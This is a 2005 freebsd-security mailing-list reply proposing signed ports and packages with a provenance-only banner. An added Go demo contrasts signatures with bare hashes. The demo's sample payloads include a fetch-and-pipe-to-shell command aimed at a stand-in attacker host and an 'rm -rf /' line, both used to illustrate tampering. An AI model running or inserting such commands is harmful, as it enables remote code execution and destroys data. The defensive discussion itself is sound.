From: "aristeu"
To: "Kris Kennaway"
Cc: freebsd-security@freebsd.org
Date: Wed, 30 Nov 2005 13:01:38 -0200
Subject: Re: Reflections on Trusting Trust
Message-ID: <008a01c5f5be$f6ff3940$e403000a@rickderringer>
List-Id: "Security issues [members-only posting]" (freebsd-security@freebsd.org)

>> Yes and no. Fixing other potential security risks is good, but not if
>> it leads users to think that the packages are more trustworthy than they
>> really are. In particular, if we started distributing signed packages,
>> I suspect that most people would assume that the signatures guaranteed
>> that the packages were good, rather than simply ensuring that the packages
>> hadn't been modified after they were built.
>>
>> If we're going to sign anything, we need to ensure not just that we're
>> signing what we think we're signing, but also that we're signing what the
>> *end users* think that we're signing.
>
> Seems to me that ignorance and a false sense of security is bad
> wherever it appears, so all we can do is try our best to educate users
> about what they're getting.

I think that with a clear policy the ports and packages could be signed. Something like a banner during installation of a port: "This key ensures that this port was made/arranged by an official FreeBSD port maintainer. The FreeBSD security team does not take responsibility for its contents since it was not scrutinized by them. Good luck!", or, for packages, a similar message saying the package was built on FreeBSD infrastructure, but the FreeBSD team doesn't take responsibility for its contents, bla, bla...

I don't know what kind of authentication you have with port maintainers, but I think between you guys and the port maintainers there must be some good scheme. This part is OK. Now it is just the FreeBSD server and end users part. Sign it with a "ports system" secret key, and a public key pre-installed on clients. The secret key well guarded on the ports system core... Simple as that; it can mitigate some problems.
I really don't think signing things ensures that a port or package is secure, but it does a hell of a better job proving that it came from where it says it came from than loose hashes. Other than that, "security by omission", if such a thing exists, won't solve anything. I know the freebsd-update and portsnap (portsnap I just discovered in this thread) solutions are good. I'm wishing this to be the FreeBSD standard. I don't want to push things, and I know things don't work this way. I just wanted to show an end user's opinion on the reflections topic... :)

That said, I'm gone....

Thanks and best regards,

--aristeu
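The scheme sketched in the message above (a secret key on the build side, a pre-installed public key on clients, and a signature that proves origin but says nothing about content) can be shown concretely. The following is an added example written for this page; it is not code from the thread, from FreeBSD's ports system, or from portsnap/freebsd-update. It assumes an Ed25519 key pair and a made-up manifest format (package name plus SHA-256 of the bytes) as the signed message; the seed, package names and payloads are constructed for the demo. The four scenarios it runs are the ones the thread argues about: a genuine signed package verifies, a tampered one fails, a "loose hash" republished by whoever tampered with the mirror still passes, and a malicious package signed with the legitimate key verifies too, which is exactly why a signature must not be read as a security audit.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// manifest is the message the "ports system" key actually signs: the package
// name and the SHA-256 of its contents. Binding the name in prevents a valid
// signature for one package from being reused under another package's name.
func manifest(name string, data []byte) []byte {
	sum := sha256.Sum256(data)
	return []byte(name + "\n" + hex.EncodeToString(sum[:]) + "\n")
}

// SignPackage runs on the build infrastructure that holds the secret key.
func SignPackage(priv ed25519.PrivateKey, name string, data []byte) []byte {
	return ed25519.Sign(priv, manifest(name, data))
}

// VerifyPackage runs on the client with the pre-installed public key.
// true means "these bytes are what the key holder signed under this name";
// it says nothing about whether the contents are safe to run.
func VerifyPackage(pub ed25519.PublicKey, name, data, sig []byte) bool {
	return ed25519.Verify(pub, manifest(string(name), data), sig)
}

// LooseHashCheck models the alternative the message argues against: a bare
// digest published next to the package, with nothing binding it to a key.
// Anyone who can replace the package can replace the digest as well.
func LooseHashCheck(publishedHex string, data []byte) bool {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:]) == publishedHex
}

// Outcome collects the result of each scenario so they can be checked.
type Outcome struct {
	GenuineVerifies            bool // correct package, correct name, correct signature
	TamperedVerifies           bool // bytes swapped on the mirror, old signature kept
	RenamedVerifies            bool // genuine bytes and signature presented under another name
	TamperedPassesLooseHash    bool // bytes swapped and the published hash swapped with them
	MaliciousButSignedVerifies bool // bad contents, but signed by the legitimate key
}

func RunScenarios() Outcome {
	// Constructed, fixed seed so the demo is reproducible. A real deployment
	// generates the key on the guarded build host and never embeds it.
	seed := bytes.Repeat([]byte{0x42}, ed25519.SeedSize)
	priv := ed25519.NewKeyFromSeed(seed)
	pub := priv.Public().(ed25519.PublicKey) // this is what clients pre-install

	// Constructed package payloads (stand-ins for real tarballs).
	genuine := []byte("#!/bin/sh\necho installing foo-1.0\n")
	sig := SignPackage(priv, "foo-1.0", genuine)

	// Mirror compromise: attacker swaps the bytes and republishes the hash.
	tampered := []byte("#!/bin/sh\nfetch -o - http://evil.invalid/x | sh\n")
	tsum := sha256.Sum256(tampered)

	// A maintainer (or a compromised build host) signs something harmful.
	malicious := []byte("#!/bin/sh\nrm -rf /\n")
	msig := SignPackage(priv, "bar-2.0", malicious)

	return Outcome{
		GenuineVerifies:            VerifyPackage(pub, []byte("foo-1.0"), genuine, sig),
		TamperedVerifies:           VerifyPackage(pub, []byte("foo-1.0"), tampered, sig),
		RenamedVerifies:            VerifyPackage(pub, []byte("bar-2.0"), genuine, sig),
		TamperedPassesLooseHash:    LooseHashCheck(hex.EncodeToString(tsum[:]), tampered),
		MaliciousButSignedVerifies: VerifyPackage(pub, []byte("bar-2.0"), malicious, msig),
	}
}

func main() {
	fmt.Printf("%+v\n", RunScenarios())
}
```

The last two fields are the practitioner's caveat: the loose hash passes for the tampered package because the attacker controls both artifacts, and the malicious package passes the signature check because the signature attests provenance, not content. The banner the message proposes is the human-readable version of that distinction.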